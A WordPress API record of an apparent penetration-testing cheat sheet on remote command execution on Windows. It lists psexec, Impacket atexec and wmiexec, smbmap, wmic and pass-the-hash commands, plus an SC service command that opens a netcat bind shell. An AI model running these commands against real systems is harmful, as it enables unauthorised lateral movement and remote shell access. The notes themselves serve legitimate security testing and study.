{"id":1839,"date":"2020-12-16T11:26:06","date_gmt":"2020-12-16T10:26:06","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1839"},"modified":"2024-09-13T16:46:05","modified_gmt":"2024-09-13T14:46:05","slug":"command-execution-on-windows","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1839","title":{"rendered":"Command execution on Windows"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">With username\/password<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">With psex\u00adec (Pre\u00adreq\u00adui\u00adsites: <span class=\"caps\">ADMIN<\/span>$ share is avail\u00adable, the user is part of the local admin\u00adis\u00adtra\u00adtor group on the target)<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On Lin\u00adux<br><code>psexec.py Domain.local\/User@$target cmd.exe<\/code><\/li>\n\n\n\n<li>On Win\u00addows\n<ul class=\"wp-block-list\">\n<li>If you have user\u00adname and pass\u00adword<br><code>.\/PsExec64.exe -i \\\\FILES04 -u corp\\jen -p Nexus123! cmd<\/code><\/li>\n\n\n\n<li>If you have a <span class=\"caps\">TGS<\/span> stored in klist<br><code>.\/PsExec64.exe \\\\FILES04 cmd<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">With psex\u00adec via Metasploit<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">use exploit\/windows\/smb\/psexec<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">With atex\u00adec (Impack\u00adet)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">atexec.py dom\/user:pass@$target cmd.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">With wmiex\u00adec<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wmiexec.py domain.local\/$target:$password@$ip<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">With Smbmap<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">With Wmic (To run a com\u00admand on mul\u00adti\u00adple sys\u00adtems, replace \/node:\u2026 with \/node:@hosts.txt and add the tar\u00adgets into this&nbsp;files.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wmic \/node:$target \/user:$user \/password:$password process call create $your_command<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Via the <span class=\"caps\">SC<\/span> Ser\u00advice Con\u00adtroller (This con\u00adnects to the $tar\u00adget via <span class=\"caps\">SMB<\/span> and cre\u00adates then a ser\u00advice and starts them. Cau\u00adtion: The ser\u00advice will be killed after 30 sec\u00adonds because it prob\u00ada\u00adbly does\u00adn\u2019t con\u00adform to the ser\u00advice stan\u00addard and calls the ser\u00advice <span class=\"caps\">API<\/span>. Go around via call\u00ading <code>cmd.exe \/k real.exe<\/code> and let it start the mali\u00adcious process.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">net use \\\\$target $password \/u:$domain\\$user<br>sc \\\\$target create $servicename binpath= \"cmd.exe \/k c:\\temp\\nc.exe -l -p 2222 -e cmd.exe\"<br>sc \\\\$target start $servicename<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">With username \/&nbsp;hash<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">With pth-winexe: (<em>Note<\/em>: The user\u2019s for\u00admat is user:lm:ntml \u2014 but pth-winexe actu\u00adal\u00adly needs only the <span class=\"caps\">NTML<\/span> hash here, but won\u2019t work if no <span class=\"caps\">LM<\/span> hash is giv\u00aden. Because some\u00adtimes no <span class=\"caps\">LM<\/span> hash is avail\u00adable, it is ok to sim\u00adply use a ran\u00addom <span class=\"caps\">LM<\/span> hash like&nbsp;here.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">pth-winexe -U $user%aad3b435b51404eeaad3b435b51404ee:$NTML \/\/$target cmd<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">With wmiex\u00adec (Require\u00adment: The tar\u00adget has the admin share <span class=\"caps\">ADMIN<\/span>$ avail\u00adable and on the local sys\u00adtem, the user needs local admin\u00adis\u00adtra\u00adtor privileges.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">impacket-wmiexec -hashes :aad3b435b51404eeaad3b435b51404ee user@$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>With username\/password With psex\u00adec (Pre\u00adreq\u00adui\u00adsites: <span class=\"caps\">ADMIN<\/span>$ share is avail\u00adable, the user is part of the local admin\u00adis\u00adtra\u00adtor group on the tar\u00adget) With psex\u00adec via Metas\u00adploit use exploit\/windows\/smb\/psexec With atex\u00adec (Impack\u00adet) atexec.py dom\/user:pass@$target cmd.exe With wmiex\u00adec wmiexec.py domain.local\/$target:$password@$ip With Smbmap smbmap \u2011u ari\u00adley \u2011p \u2018pass\u2019 \u2011d <span class=\"caps\">WORKGROUP<\/span> \u2011x \u2018whoa\u00admi\u2019 \u2011H $tar\u00adget With Wmic (To run&nbsp;a&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,471],"tags":[302,24],"class_list":["post-1839","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-privesc","tag-execution","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1839","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1839"}],"version-history":[{"count":12,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions"}],"predecessor-version":[{"id":4364,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1839\/revisions\/4364"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}